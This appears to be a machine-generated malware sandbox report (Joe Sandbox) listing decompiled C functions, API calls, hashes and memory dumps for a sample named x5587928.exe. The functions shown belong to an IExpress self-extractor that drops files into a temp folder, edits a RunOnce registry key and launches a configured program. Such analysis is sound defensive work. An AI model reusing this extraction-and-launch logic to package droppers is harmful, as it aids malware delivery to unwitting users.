Associated: 00000005.00000002.798500963.000000000093A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_930000_6F2B.jbxd

Similarity

API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
String ID:
API String ID: 1273765764-0
Opcode ID: f957eb5447c17823d9cc2c5ade13d17cb111febd0bbba0676f958075f0ea9ae6
Instruction ID: 4cfc5407c4ceeedfd1c14669f1736a0ae15baa6fe70f1b79dfeb7bb3bb65b0b5
Opcode Fuzzy Hash: f957eb5447c17823d9cc2c5ade13d17cb111febd0bbba0676f958075f0ea9ae6
Instruction Fuzzy Hash: 2811C431619109AFDB10EFA4DE08BAE77B8EF49301F108154F952D31A0DB309E01EF95

Uniqueness

Uniqueness Score: -1.00%

Function 009363C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69
fileCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E009363C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
				signed int _v8;
				char _v268;
				long _v272;
				void* _v276;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t15;
				long _t28;
				struct _OVERLAPPED* _t37;
				void* _t39;
				signed int _t40;

				_t15 =  *0x938004; // 0x911e09f9
				_v8 = _t15 ^ _t40;
				_v272 = _v272 & 0x00000000;
				_push(__ecx);
				_v276 = _a16;
				_t37 = 1;
				E00931781( &_v268, 0x104, __ecx, "C:\Users\alfons\AppData\Local\Temp\IXP000.TMP\");
				E0093658A( &_v268, 0x104, _a12);
				_t28 = 0;
				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
				if(_t39 != 0xffffffff) {
					_t28 = _a4;
					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
						 *0x939124 = 0x80070052;
						_t37 = 0;
					}
					CloseHandle(_t39);
				} else {
					 *0x939124 = 0x80070052;
					_t37 = 0;
				}
				return E00936CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
			}

0x009363cb
0x009363d2
0x009363d8
0x009363ea
0x009363f3
0x00936401
0x00936402
0x00936410
0x00936415
0x00936433
0x00936438
0x00936449
0x00936463
0x0093646d
0x00936477
0x00936477
0x0093647a
0x0093643a
0x0093643a
0x00936444
0x00936444
0x00936492

APIs

CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 0093642D
WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 0093645B
CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 0093647A

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 009363EB

Memory Dump Source

Source File: 00000005.00000002.798408656.0000000000931000.00000020.00000001.01000000.00000006.sdmp, Offset: 00930000, based on PE: true

Associated: 00000005.00000002.798382883.0000000000930000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798447613.0000000000938000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_930000_6F2B.jbxd

Similarity

API ID: File$CloseCreateHandleWrite
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
API String ID: 1065093856-1193786559
Opcode ID: 2f41b0b4c2e46bcfc7ec8f40c54c87a4da1b1debd10fea5b98f109a3b49f5184
Instruction ID: 6de6abbd1b614de812e4a25149a27b253c03183c24ae302556e20c9b4f8b587b
Opcode Fuzzy Hash: 2f41b0b4c2e46bcfc7ec8f40c54c87a4da1b1debd10fea5b98f109a3b49f5184
Instruction Fuzzy Hash: 1D21D271A04218ABDB10DF65DC89FEB776CEB85314F0041A9F585A3290DBB45D849FA4

Uniqueness

Uniqueness Score: -1.00%

Function 00931FE1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 23
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00931FE1(void* __ecx) {
				void* _v8;
				long _t4;

				if( *0x938530 != 0) {
					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8);
					if(_t4 == 0) {
						RegDeleteValueA(_v8, 0x938530);
						return RegCloseKey(_v8);
					}
				}
				return _t4;
			}

0x00931fee
0x00932005
0x0093200d
0x00932017
0x00000000
0x00932020
0x0093200d
0x00932029

APIs

RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,0093538C,?,?,0093538C), ref: 00932005
RegDeleteValueA.ADVAPI32(0093538C,00938530,?,?,0093538C), ref: 00932017
RegCloseKey.ADVAPI32(0093538C,?,?,0093538C), ref: 00932020

Strings

Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00931FFB

Memory Dump Source

Source File: 00000005.00000002.798408656.0000000000931000.00000020.00000001.01000000.00000006.sdmp, Offset: 00930000, based on PE: true

Associated: 00000005.00000002.798382883.0000000000930000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798447613.0000000000938000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_930000_6F2B.jbxd

Similarity

API ID: CloseDeleteOpenValue
String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce
API String ID: 849931509-2045179639
Opcode ID: 29262521e5838ef262c12697a07e33271423fe67e78dc9f0e323d208560a561c
Instruction ID: 1ff75ea57d23bc74dc3b77e3a143c795af1fc140948eb068ee30d596dba10db0
Opcode Fuzzy Hash: 29262521e5838ef262c12697a07e33271423fe67e78dc9f0e323d208560a561c
Instruction Fuzzy Hash: 7AE08631564318BBD7298F90ED4AF5E7B2DF741744F1001D4F944A00A0EBB15E14EE05

Uniqueness

Uniqueness Score: -1.00%

Function 009347E0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 64
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E009347E0(intOrPtr* __ecx) {
				intOrPtr _t6;
				intOrPtr _t9;
				void* _t11;
				void* _t19;
				intOrPtr* _t22;
				void _t24;
				struct HWND__* _t25;
				struct HWND__* _t26;
				void* _t27;
				intOrPtr* _t28;
				intOrPtr* _t33;
				void* _t34;

				_t33 = __ecx;
				_t34 = LocalAlloc(0x40, 8);
				if(_t34 != 0) {
					_t22 = _t33;
					_t27 = _t22 + 1;
					do {
						_t6 =  *_t22;
						_t22 = _t22 + 1;
					} while (_t6 != 0);
					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
					 *_t34 = _t24;
					if(_t24 != 0) {
						_t28 = _t33;
						_t19 = _t28 + 1;
						do {
							_t9 =  *_t28;
							_t28 = _t28 + 1;
						} while (_t9 != 0);
						E00931680(_t24, _t28 - _t19 + 1, _t33);
						_t11 =  *0x9391e0; // 0x35182e0
						 *(_t34 + 4) = _t11;
						 *0x9391e0 = _t34;
						return 1;
					}
					_t25 =  *0x938584; // 0x0
					E009344B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
					LocalFree(_t34);
					L2:
					return 0;
				}
				_t26 =  *0x938584; // 0x0
				E009344B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
				goto L2;
			}

0x009347e8
0x009347f0
0x009347f4
0x0093480f
0x00934811
0x00934814
0x00934814
0x00934816
0x00934817
0x00934829
0x0093482b
0x0093482f
0x0093484f
0x00934852
0x00934855
0x00934855
0x00934857
0x00934858
0x00934860
0x00934865
0x0093486a
0x0093486f
0x00000000
0x00934876
0x00934831
0x00934841
0x00934847
0x0093480b
0x00000000
0x0093480b
0x009347f6
0x00934806
0x00000000

APIs

LocalAlloc.KERNEL32(00000040,00000008,?,00000000,00934E6F), ref: 009347EA
LocalAlloc.KERNEL32(00000040,?), ref: 00934823
LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 00934847

Part of subcall function 009344B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00934518
Part of subcall function 009344B9: MessageBoxA.USER32(?,?,foto5566,00010010), ref: 00934554

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00934851

Memory Dump Source

Source File: 00000005.00000002.798408656.0000000000931000.00000020.00000001.01000000.00000006.sdmp, Offset: 00930000, based on PE: true

Associated: 00000005.00000002.798382883.0000000000930000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798447613.0000000000938000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_930000_6F2B.jbxd

Similarity

API ID: Local$Alloc$FreeLoadMessageString
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
API String ID: 359063898-1193786559
Opcode ID: d0c574e7190988143f1a30fd1ae561de49d0dfbff7f292caec5ef8bf40f48c21
Instruction ID: e4a3b5b1e81a347bca620858855e28557f33ca19786524ea7f804f2c465317c0
Opcode Fuzzy Hash: d0c574e7190988143f1a30fd1ae561de49d0dfbff7f292caec5ef8bf40f48c21
Instruction Fuzzy Hash: A511E5756087416FD7149F649C18F773B9AEBC5300F058559FA829B341DA35EC069F60

Uniqueness

Uniqueness Score: -1.00%

Function 00933680 Relevance: 6.1, APIs: 4, Instructions: 51
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00933680(void* __ecx) {
				void* _v8;
				struct tagMSG _v36;
				int _t8;
				struct HWND__* _t16;

				_v8 = __ecx;
				_t16 = 0;
				while(1) {
					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
					if(_t8 == 0) {
						break;
					}
					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
						continue;
					} else {
						do {
							if(_v36.message != 0x12) {
								DispatchMessageA( &_v36);
							} else {
								_t16 = 1;
							}
							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
						} while (_t8 != 0);
						if(_t16 == 0) {
							continue;
						}
					}
					break;
				}
				return _t8;
			}

0x0093368c
0x0093368f
0x00933691
0x0093369f
0x009336a7
0x00000000
0x00000000
0x009336ba
0x00000000
0x009336bc
0x009336bc
0x009336c0
0x009336cb
0x009336c2
0x009336c4
0x009336c4
0x009336da
0x009336e0
0x009336e6
0x00000000
0x00000000
0x009336e6
0x00000000
0x009336ba
0x009336ed

APIs

MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 0093369F
PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 009336B2
DispatchMessageA.USER32(?), ref: 009336CB
PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 009336DA

Memory Dump Source

Source File: 00000005.00000002.798408656.0000000000931000.00000020.00000001.01000000.00000006.sdmp, Offset: 00930000, based on PE: true

Associated: 00000005.00000002.798382883.0000000000930000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798447613.0000000000938000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_930000_6F2B.jbxd

Similarity

API ID: Message$Peek$DispatchMultipleObjectsWait
String ID:
API String ID: 2776232527-0
Opcode ID: 0af84658baf01e226bfd60c5be90eb9231023afb7f073372f13457068aac9126
Instruction ID: c521db9a413a10f13879f83c71e77ba55f2a5b06b2186a5506af44a000f4ea53
Opcode Fuzzy Hash: 0af84658baf01e226bfd60c5be90eb9231023afb7f073372f13457068aac9126
Instruction Fuzzy Hash: 1901A7729442147FDB304BE65C4EEEB76BCEBC5B14F004219F905E2180D661C640DEA0

Uniqueness

Uniqueness Score: -1.00%

Function 00936517 Relevance: 6.1, APIs: 4, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00936517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, int _a16) {
				struct HRSRC__* _t6;
				void* _t21;
				struct HINSTANCE__* _t23;
				int _t24;

				_t23 =  *0x939a3c; // 0x930000
				_t6 = FindResourceA(_t23, __edx, 5);
				if(_t6 == 0) {
					L6:
					E009344B9(0, 0x4fb, 0, 0, 0x10, 0);
					_t24 = _a16;
				} else {
					_t21 = LoadResource(_t23, _t6);
					if(_t21 == 0) {
						goto L6;
					} else {
						if(_a12 != 0) {
							_push(_a12);
						} else {
							_push(0);
						}
						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
						FreeResource(_t21);
						if(_t24 == 0xffffffff) {
							goto L6;
						}
					}
				}
				return _t24;
			}

0x0093651f
0x0093652a
0x00936534
0x0093656b
0x00936577
0x0093657c
0x00936536
0x0093653e
0x00936542
0x00000000
0x00936544
0x00936547
0x0093654c
0x00936549
0x00936549
0x00936549
0x0093655e
0x00936560
0x00936569
0x00000000
0x00000000
0x00936569
0x00936542
0x00936587

APIs

FindResourceA.KERNEL32(00930000,000007D6,00000005), ref: 0093652A
LoadResource.KERNEL32(00930000,00000000,?,?,00932EE8,00000000,009319E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00936538
DialogBoxIndirectParamA.USER32(00930000,00000000,00000547,009319E0,00000000), ref: 00936557
FreeResource.KERNEL32(00000000,?,?,00932EE8,00000000,009319E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00936560

Memory Dump Source

Source File: 00000005.00000002.798408656.0000000000931000.00000020.00000001.01000000.00000006.sdmp, Offset: 00930000, based on PE: true

Associated: 00000005.00000002.798382883.0000000000930000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798447613.0000000000938000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_930000_6F2B.jbxd

Similarity

API ID: Resource$DialogFindFreeIndirectLoadParam
String ID:
API String ID: 1214682469-0
Opcode ID: 9f8f4cde2350cf91894b94936d007689908ed79ecbaa198f78e6b26a52ac4216
Instruction ID: 1435712adf8bb7ed8fefb9435b028dcbb0683203d19a060d38f6f010866c622b
Opcode Fuzzy Hash: 9f8f4cde2350cf91894b94936d007689908ed79ecbaa198f78e6b26a52ac4216
Instruction Fuzzy Hash: 01014473108609BBCB105FA99C48EBB7AACEB8A360F004139FE50E3190D771CC10EEA1

Uniqueness

Uniqueness Score: -1.00%

Function 009365E8 Relevance: 6.0, APIs: 4, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E009365E8(char* __ecx) {
				char _t3;
				char _t10;
				char* _t12;
				char* _t14;
				char* _t15;
				CHAR* _t16;

				_t12 = __ecx;
				_t15 = __ecx;
				_t14 =  &(__ecx[1]);
				_t10 = 0;
				do {
					_t3 =  *_t12;
					_t12 =  &(_t12[1]);
				} while (_t3 != 0);
				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
				while(1) {
					_t16 = CharPrevA(_t15, ??);
					if(_t16 <= _t15) {
						break;
					}
					if( *_t16 == 0x5c) {
						L7:
						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
							_t16 = CharNextA(_t16);
						}
						 *_t16 = _t10;
						_t10 = 1;
					} else {
						_push(_t16);
						continue;
					}
					L11:
					return _t10;
				}
				if( *_t16 == 0x5c) {
					goto L7;
				}
				goto L11;
			}

0x009365e8
0x009365ed
0x009365ef
0x009365f2
0x009365f4
0x009365f4
0x009365f6
0x009365f7
0x00936608
0x00936611
0x00936618
0x0093661c
0x00000000
0x00000000
0x0093660e
0x00936623
0x00936625
0x0093663b
0x0093663b
0x0093663d
0x00936641
0x00936610
0x00936610
0x00000000
0x00936610
0x00936644
0x00936647
0x00936647
0x00936621
0x00000000
0x00000000
0x00000000

APIs

CharPrevA.USER32(?,00000000,00000000,00000001,00000000,00932B33), ref: 00936602
CharPrevA.USER32(?,00000000), ref: 00936612
CharPrevA.USER32(?,00000000), ref: 00936629
CharNextA.USER32(00000000), ref: 00936635

Memory Dump Source

Source File: 00000005.00000002.798408656.0000000000931000.00000020.00000001.01000000.00000006.sdmp, Offset: 00930000, based on PE: true

Associated: 00000005.00000002.798382883.0000000000930000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798447613.0000000000938000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_930000_6F2B.jbxd

Similarity

API ID: Char$Prev$Next
String ID:
API String ID: 3260447230-0
Opcode ID: 526a9dbcade91832f10c6c97387fd92ce0d2563b243139ca9781a4ee221add0b
Instruction ID: b277a5a09ca9c95db2ce389d4885010cee00e108ec1e88eff4d92dc6f546713a
Opcode Fuzzy Hash: 526a9dbcade91832f10c6c97387fd92ce0d2563b243139ca9781a4ee221add0b
Instruction Fuzzy Hash: 83F0283200C1507EE7321B688C88CBBBF9CCF97399F2941AFE4D282011D6150D069F71

Uniqueness

Uniqueness Score: -1.00%

Function 009369B0 Relevance: 6.0, APIs: 4, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E009369B0() {
				intOrPtr* _t4;
				intOrPtr* _t5;
				void* _t6;
				intOrPtr _t11;
				intOrPtr _t12;

				 *0x9381f8 = E00936C70();
				__set_app_type(E00936FBE(2));
				 *0x9388a4 =  *0x9388a4 | 0xffffffff;
				 *0x9388a8 =  *0x9388a8 | 0xffffffff;
				_t4 = __p__fmode();
				_t11 =  *0x938528; // 0x0
				 *_t4 = _t11;
				_t5 = __p__commode();
				_t12 =  *0x93851c; // 0x0
				 *_t5 = _t12;
				_t6 = E00937000();
				if( *0x938000 == 0) {
					__setusermatherr(E00937000);
				}
				E009371EF(_t6);
				return 0;
			}

0x009369b7
0x009369c2
0x009369c8
0x009369cf
0x009369d8
0x009369de
0x009369e4
0x009369e6
0x009369ec
0x009369f2
0x009369f4
0x00936a00
0x00936a07
0x00936a0d
0x00936a0e
0x00936a15

APIs

Part of subcall function 00936FBE: GetModuleHandleW.KERNEL32(00000000), ref: 00936FC5

__set_app_type.MSVCRT ref: 009369C2
__p__fmode.MSVCRT ref: 009369D8
__p__commode.MSVCRT ref: 009369E6
__setusermatherr.MSVCRT ref: 00936A07

Memory Dump Source

Source File: 00000005.00000002.798408656.0000000000931000.00000020.00000001.01000000.00000006.sdmp, Offset: 00930000, based on PE: true

Associated: 00000005.00000002.798382883.0000000000930000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798447613.0000000000938000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_930000_6F2B.jbxd

Similarity

API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
String ID:
API String ID: 1632413811-0
Opcode ID: 9cc3d71ae77d05824aaa23b2dd771754b2a2e393e9faea4e924c982bdf4f45ad
Instruction ID: e739e92b58fe996f78d7cab65d5431a2c693185817b9b6da09d3f6778830d0a1
Opcode Fuzzy Hash: 9cc3d71ae77d05824aaa23b2dd771754b2a2e393e9faea4e924c982bdf4f45ad
Instruction Fuzzy Hash: C8F0F8B012C3019FC728AF70AE0A6067BA1FB84321F104609F4A1862F1CF7A8540AE11

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: x5587928.exePID: 5700, Parent PID: 5796COMMON

Execution Graph

Execution Coverage:	25%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	967
Total number of Limit Nodes:	40

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00CE3BA2 Relevance: 40.6, APIs: 11, Strings: 12, Instructions: 308
libraryloaderCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E00CE3BA2() {
				signed int _v8;
				signed int _v12;
				char _v276;
				char _v280;
				short _v300;
				intOrPtr _v304;
				void _v348;
				char _v352;
				intOrPtr _v356;
				signed int _v360;
				short _v364;
				char* _v368;
				intOrPtr _v372;
				void* _v376;
				intOrPtr _v380;
				char _v384;
				signed int _v388;
				intOrPtr _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				void* _v408;
				void* _v424;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t69;
				signed int _t76;
				void* _t77;
				signed int _t79;
				short _t96;
				signed int _t97;
				intOrPtr _t98;
				signed int _t101;
				signed int _t104;
				signed int _t108;
				int _t112;
				void* _t115;
				signed char _t118;
				void* _t125;
				signed int _t127;
				void* _t128;
				struct HINSTANCE__* _t129;
				void* _t130;
				short _t137;
				char* _t140;
				signed char _t144;
				signed char _t145;
				signed int _t149;
				void* _t150;
				void* _t151;
				signed int _t153;
				void* _t155;
				void* _t156;
				signed int _t157;
				signed int _t162;
				signed int _t164;
				void* _t165;

				_t164 = (_t162 & 0xfffffff8) - 0x194;
				_t69 =  *0xce8004; // 0xd1db73d
				_v8 = _t69 ^ _t164;
				_t153 = 0;
				 *0xce9124 =  *0xce9124 & 0;
				_t149 = 0;
				_v388 = 0;
				_v384 = 0;
				_t165 =  *0xce8a28 - _t153; // 0x0
				if(_t165 != 0) {
					L3:
					_t127 = 0;
					_v392 = 0;
					while(1) {
						_v400 = _v400 & 0x00000000;
						memset( &_v348, 0, 0x44);
						_t164 = _t164 + 0xc;
						_v348 = 0x44;
						if( *0xce8c42 != 0) {
							goto L26;
						}
						_t146 =  &_v396;
						_t115 = E00CE468F("SHOWWINDOW",  &_v396, 4);
						if(_t115 == 0 || _t115 > 4) {
							L25:
							_t146 = 0x4b1;
							E00CE44B9(0, 0x4b1, 0, 0, 0x10, 0);
							 *0xce9124 = 0x80070714;
							goto L62;
						} else {
							if(_v396 != 1) {
								__eflags = _v396 - 2;
								if(_v396 != 2) {
									_t137 = 3;
									__eflags = _v396 - _t137;
									if(_v396 == _t137) {
										_v304 = 1;
										_v300 = _t137;
									}
									goto L14;
								}
								_push(6);
								_v304 = 1;
								_pop(0);
								goto L11;
							} else {
								_v304 = 1;
								L11:
								_v300 = 0;
								L14:
								if(_t127 != 0) {
									L27:
									_t155 = 1;
									__eflags = _t127 - 1;
									if(_t127 != 1) {
										L31:
										_t132 =  &_v280;
										_t76 = E00CE1AE8( &_v280,  &_v408,  &_v404); // executed
										__eflags = _t76;
										if(_t76 == 0) {
											L62:
											_t77 = 0;
											L63:
											_pop(_t150);
											_pop(_t156);
											_pop(_t128);
											return E00CE6CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
										}
										_t157 = _v404;
										__eflags = _t149;
										if(_t149 != 0) {
											L37:
											__eflags = _t157;
											if(_t157 == 0) {
												L57:
												_t151 = _v408;
												_t146 =  &_v352;
												_t130 = _t151; // executed
												_t79 = E00CE3FEF(_t130,  &_v352); // executed
												__eflags = _t79;
												if(_t79 == 0) {
													L61:
													LocalFree(_t151);
													goto L62;
												}
												L58:
												LocalFree(_t151);
												_t127 = _t127 + 1;
												_v396 = _t127;
												__eflags = _t127 - 2;
												if(_t127 >= 2) {
													_t155 = 1;
													__eflags = 1;
													L69:
													__eflags =  *0xce8580;
													if( *0xce8580 != 0) {
														E00CE2267();
													}
													_t77 = _t155;
													goto L63;
												}
												_t153 = _v392;
												_t149 = _v388;
												continue;
											}
											L38:
											__eflags =  *0xce8180;
											if( *0xce8180 == 0) {
												_t146 = 0x4c7;
												E00CE44B9(0, 0x4c7, 0, 0, 0x10, 0);
												LocalFree(_v424);
												 *0xce9124 = 0x8007042b;
												goto L62;
											}
											__eflags = _t157;
											if(_t157 == 0) {
												goto L57;
											}
											__eflags =  *0xce9a34 & 0x00000004;
											if(__eflags == 0) {
												goto L57;
											}
											_t129 = E00CE6495(_t127, _t132, _t157, __eflags);
											__eflags = _t129;
											if(_t129 == 0) {
												_t146 = 0x4c8;
												E00CE44B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
												L65:
												LocalFree(_v408);
												 *0xce9124 = E00CE6285();
												goto L62;
											}
											_t146 = GetProcAddress(_t129, "DoInfInstall");
											_v404 = _t146;
											__eflags = _t146;
											if(_t146 == 0) {
												_t146 = 0x4c9;
												__eflags = 0;
												E00CE44B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
												FreeLibrary(_t129);
												goto L65;
											}
											__eflags =  *0xce8a30;
											_t151 = _v408;
											_v384 = 0;
											_v368 =  &_v280;
											_t96 =  *0xce9a40; // 0x3
											_v364 = _t96;
											_t97 =  *0xce8a38 & 0x0000ffff;
											_v380 = 0xce9154;
											_v376 = _t151;
											_v372 = 0xce91e4;
											_v360 = _t97;
											if( *0xce8a30 != 0) {
												_t97 = _t97 | 0x00010000;
												__eflags = _t97;
												_v360 = _t97;
											}
											_t144 =  *0xce9a34; // 0x1
											__eflags = _t144 & 0x00000008;
											if((_t144 & 0x00000008) != 0) {
												_t97 = _t97 | 0x00020000;
												__eflags = _t97;
												_v360 = _t97;
											}
											__eflags = _t144 & 0x00000010;
											if((_t144 & 0x00000010) != 0) {
												_t97 = _t97 | 0x00040000;
												__eflags = _t97;
												_v360 = _t97;
											}
											_t145 =  *0xce8d48; // 0x0
											__eflags = _t145 & 0x00000040;
											if((_t145 & 0x00000040) != 0) {
												_t97 = _t97 | 0x00080000;
												__eflags = _t97;
												_v360 = _t97;
											}
											__eflags = _t145;
											if(_t145 < 0) {
												_t104 = _t97 | 0x00100000;
												__eflags = _t104;
												_v360 = _t104;
											}
											_t98 =  *0xce9a38; // 0x0
											_v356 = _t98;
											_t130 = _t146;
											 *0xcea288( &_v384);
											_t101 = _v404();
											__eflags = _t164 - _t164;
											if(_t164 != _t164) {
												_t130 = 4;
												asm("int 0x29");
											}
											 *0xce9124 = _t101;
											_push(_t129);
											__eflags = _t101;
											if(_t101 < 0) {
												FreeLibrary();
												goto L61;
											} else {
												FreeLibrary();
												_t127 = _v400;
												goto L58;
											}
										}
										__eflags =  *0xce9a40 - 1; // 0x3
										if(__eflags == 0) {
											goto L37;
										}
										__eflags =  *0xce8a20;
										if( *0xce8a20 == 0) {
											goto L37;
										}
										__eflags = _t157;
										if(_t157 != 0) {
											goto L38;
										}
										_v388 = 1;
										E00CE202A(_t146); // executed
										goto L37;
									}
									_t146 =  &_v280;
									_t108 = E00CE468F("POSTRUNPROGRAM",  &_v280, 0x104);
									__eflags = _t108;
									if(_t108 == 0) {
										goto L25;
									}
									__eflags =  *0xce8c42;
									if( *0xce8c42 != 0) {
										goto L69;
									}
									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
									__eflags = _t112 == 0;
									if(_t112 == 0) {
										goto L69;
									}
									goto L31;
								}
								_t118 =  *0xce8a38; // 0x0
								if(_t118 == 0) {
									L23:
									if(_t153 != 0) {
										goto L31;
									}
									_t146 =  &_v276;
									if(E00CE468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
										goto L27;
									}
									goto L25;
								}
								if((_t118 & 0x00000001) == 0) {
									__eflags = _t118 & 0x00000002;
									if((_t118 & 0x00000002) == 0) {
										goto L62;
									}
									_t140 = "USRQCMD";
									L20:
									_t146 =  &_v276;
									if(E00CE468F(_t140,  &_v276, 0x104) == 0) {
										goto L25;
									}
									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
										_t153 = 1;
										_v388 = 1;
									}
									goto L23;
								}
								_t140 = "ADMQCMD";
								goto L20;
							}
						}
						L26:
						_push(_t130);
						_t146 = 0x104;
						E00CE1781( &_v276, 0x104, _t130, 0xce8c42);
						goto L27;
					}
				}
				_t130 = "REBOOT";
				_t125 = E00CE468F(_t130, 0xce9a2c, 4);
				if(_t125 == 0 || _t125 > 4) {
					goto L25;
				} else {
					goto L3;
				}
			}

0x00ce3baa
0x00ce3bb0
0x00ce3bb7
0x00ce3bc0
0x00ce3bc2
0x00ce3bc9
0x00ce3bcb
0x00ce3bcf
0x00ce3bd3
0x00ce3bd9
0x00ce3bfd
0x00ce3bfd
0x00ce3bff
0x00ce3c03
0x00ce3c03
0x00ce3c11
0x00ce3c16
0x00ce3c19
0x00ce3c28
0x00000000
0x00000000
0x00ce3c30
0x00ce3c39
0x00ce3c40
0x00ce3d13
0x00ce3d15
0x00ce3d21
0x00ce3d26
0x00000000
0x00ce3c4f
